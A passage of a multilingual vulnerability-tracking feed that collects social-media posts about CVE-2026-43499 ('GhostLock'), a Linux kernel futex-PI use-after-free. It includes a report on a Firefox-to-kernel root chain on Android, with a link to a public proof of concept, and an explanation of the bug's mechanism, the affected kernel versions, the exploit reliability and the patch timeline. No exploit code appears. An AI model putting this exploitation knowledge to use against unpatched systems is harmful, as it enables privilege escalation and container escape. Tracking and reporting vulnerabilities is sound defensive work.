"https://t.me/poxek/6234", "content": "IonStack: root Android 17 \u0441 \u043e\u0434\u043d\u043e\u0433\u043e URL\n\nNebula Security \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430 IonStack \u2014 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u0443\u044e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044e \u0446\u0435\u043f\u043e\u0447\u043a\u0438 Firefox \u2192 Linux kernel, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430 Android 17 \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0432\u0435\u0441\u0442\u0438 \u043e\u0434\u0438\u043d \u043a\u043b\u0438\u043a \u043f\u043e URL \u0434\u043e root-\u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0412 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2026-10702, JIT miscompilation \u0432 JavaScript Engine Firefox, \u0437\u0430\u043a\u0440\u044b\u0442\u0430\u044f \u0432 Firefox 151.0.3, \u0438 CVE-2026-43499 GhostLock \u2014 use-after-free \u0432 rtmutex/futex-PI \u043a\u043e\u0434\u0435 \u044f\u0434\u0440\u0430 Linux.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438 \u044d\u0442\u043e browser-to-kernel full chain. \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0431\u0430\u0433 \u0432 Firefox \u0434\u0430\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u0437\u0430\u0442\u0435\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f kernel LPE \u043f\u0440\u043e\u0431\u0438\u0432\u0430\u0435\u0442 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u0438 \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u0423 GhostLock \u043c\u0435\u0445\u0430\u043d\u0438\u043a\u0430: \u043e\u0431\u044b\u0447\u043d\u044b\u0435 threading/futex syscalls \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0432\u0438\u0441\u044f\u0447\u0438\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0441\u0442\u0435\u043a \u044f\u0434\u0440\u0430; \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d \u2014 Linux 2.6.39-rc1 \u0434\u043e 7.1-rc1 \u043f\u0440\u0438 CONFIG_FUTEX_PI=y, \u0430 \u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432 kernelCTF \u0431\u044b\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 97% \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0439.\n\n\u0412\u0430\u0436\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435: \u044d\u0442\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0435 \u0434\u0435\u043c\u043e \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 PoC, \u0430 \u043d\u0435 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. Android-\u0447\u0430\u0441\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u0442 \u043e\u0442 Firefox/Fenix \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u044f\u0434\u0440\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435; \u043d\u0430 \u0434\u0435\u043c\u043e-\u0441\u0430\u0439\u0442\u0435 Nebula \u043f\u0440\u044f\u043c\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 \u043f\u0430\u0434\u0435\u043d\u0438\u044f\u0445, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u043f\u043e\u0442\u0435\u0440\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\ud83d\udc31  GitHub PoC\n\n\ud83c\udf1a @poxek | \ud83c\udf1a @poxek_ai | \ud83d\udcf2 MAX", "creation_timestamp": "2026-07-13T13:00:04.154773Z"}, {"uuid": "a121993d-878e-463e-a67e-eb531e34f985", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/enakat-it.bsky.social/post/3mqjqqcmh7626", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306b\u7279\u6a29\u6607\u683c\u306e\u8106\u5f31\u6027CVE-2026-43499\u304c\u5224\u660e\n\u30a8\u30f3\u30b8\u30cb\u30a2\u3078\u306e\u5f71\u97ff\uff1a\u30b3\u30f3\u30c6\u30ca\u5206\u96e2\u304c\u7a81\u7834\u3055\u308c\u30ce\u30fc\u30c9\u304a\u3088\u3073\u30af\u30e9\u30b9\u30bf\u30fc\u6a29\u9650\u596a\u53d6\u306e\u30ea\u30b9\u30af\u304c\u5897\u5927\nhttps://dev.to/thecybersidekick/ghostlock-cve-2026-43499-how-a-linux-kernel-privilege-escalation-exposes-kubernetes-multi-tenant-4703", "creation_timestamp": "2026-07-13T13:00:30.080971Z"}, {"uuid": "466e51a8-cdfa-49f1-915d-15495e03a8f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/CakesTwix.shkey.cakestwix.com.ap.brid.gy/post/3mqju76x6hbl2", "content": "\u0422\u043e\u0439 \u0432\u043e, \u043d\u0430\u043f\u0435\u0432\u043d\u043e \u0431\u0430\u0447\u0438\u043b\u0438 \u0449\u043e \u044f \u0442\u0440\u043e\u0448\u043a\u0438, \u0430 \u0442\u043e\u0447\u043d\u0456\u0448\u0435 @acroreiser \u043f\u043e\u0447\u0430\u0432 \u0444\u0456\u043a\u0441\u0438\u0442\u0438 \u0443 \u0441\u0432\u043e\u0457\u0445 \u044f\u0434\u0440\u0430\u0445 \u043d\u0435 \u0442\u0456\u043b\u044c\u043a\u0438 BPF, \u0430 \u0449\u0435 \u0439 CVE\n\n\u0422\u0430\u043a\u043e\u0436 \u043d\u0430\u043f\u0435\u0432\u043d\u043e \u0431\u0430\u0447\u0438\u043b\u0438 \u0442\u0430\u043a\u043e\u0439 CVE \u044f\u043a CVE-2026-43499, \u0449\u043e \u0443 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0456 \u0434\u0430\u0454 root \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 Linux, \u0442\u043e\u0431\u0442\u043e \u0441\u0430\u043c Android \u0442\u0435\u0436 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u0438\u0439. \u0412\u0436\u0435 \u0454 \u0440\u0435\u043f\u043e \u0437 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u043d\u043d\u044f\u043c \u0446\u044c\u043e\u0433\u043e cve \u043d\u0430 \u0445\u043b\u044f\u043e\u043c\u0456 [\u2026]", "creation_timestamp": "2026-07-13T14:02:32.632007Z"}, {"uuid": "03524613-bf5d-4b5f-b660-de9ee23c58d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/krazylars.bsky.social/post/3mqjwwznyis2t", "content": "An AI tool named VEGA identified a 15-year-old root bug, CVE-2026-43499, in the kernel's futex code that allows local users to access and escape Docker containers. The vulnerability affects distributions like Ubuntu and RHEL dating back to 2011, requiring an immediate update to the Linux 7.1 kernel.", "creation_timestamp": "2026-07-13T14:51:37.763128Z"}, {"uuid": "e39c252b-e370-4471-898f-d4f87a365ae5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/true_secator/8401", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u043e\u043b\u0435\u0435 15 \u043b\u0435\u0442, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-43499 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 GhostLock. \u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0438 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432.\n\n\u0417\u0430 \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Nebula Security \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u043c\u0435\u0440\u0435 92 337 \u0434\u043e\u043b\u043b. \u043f\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 kernelCTF \u043e\u0442 Google.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u043e\u0448\u0438\u0431\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0441\u043f\u0435\u0445\u0430 \u0432 97%. GhostLock \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432 Linux 2.6.39 \u0432 2011 \u0433\u043e\u0434\u0443 \u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432 \u044f\u0434\u0440\u0435 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u044b\u043b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u0432 Linux 7.1, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432 \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nGhostLock \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (rtmutex) \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043e\u0432 futex.\n\n\u0418\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u044f\u0434\u0440\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0432\u0438\u0441\u044f\u0447\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u0432 \u0441\u0442\u0435\u043a\u0435 \u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u044d\u0442\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0434\u0438\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0425\u043e\u0442\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 Nebula Security \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0435\u0440\u0435\u0434\u043e\u0432\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u044f\u0434\u0440\u0430 \u0438 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043b\u0435\u0436\u0430\u0449\u0430\u044f \u0432 \u0435\u0433\u043e \u043e\u0441\u043d\u043e\u0432\u0435 \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430.\n\n\u0412\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0436\u0435 \u0431\u044b\u043b\u0430 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0434\u0440\u0443\u0433\u043e\u043c, \u0433\u0434\u0435 \u043e\u043d\u0430 \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u044f\u0434\u0440\u0430.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 GhostLock \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438, \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043b\u0438 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u044f\u0434\u0440\u0430.\n\n\u0421\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u0435\u0441\u043b\u0438 \u0432 \u043d\u0435\u0439 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 CONFIG_FUTEX_PI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u044b\u0445 \u044f\u0434\u0435\u0440 Linux.\n\n\u041e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0438 18 \u0430\u043f\u0440\u0435\u043b\u044f 2026 \u0433\u043e\u0434\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c. \u0414\u0440\u0443\u0433\u043e\u0439 \u043f\u0430\u0442\u0447, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0431\u044b\u043b \u043f\u0440\u0438\u043d\u044f\u0442 \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f, \u0438 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0440\u0430.\n\nGoogle \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 Nebula Security \u0432 kernelCTF 30 \u0438\u044e\u043d\u044f, \u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0441\u0432\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0441\u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0447\u0438\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u0434\u0430\u0447\u0438 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u00ab\u0432\u0438\u0441\u044f\u0447\u0438\u0439\u00bb \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442.\n\nNebula Security \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0438\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u0430\u043a RANDOMIZE_KSTACK_OFFSET, \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u0435\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0435\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0445\u043e\u0442\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0434\u0440\u0430 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c Linux \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u043c, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u0442\u0430\u043d\u0443\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 GhostLock \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0432 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 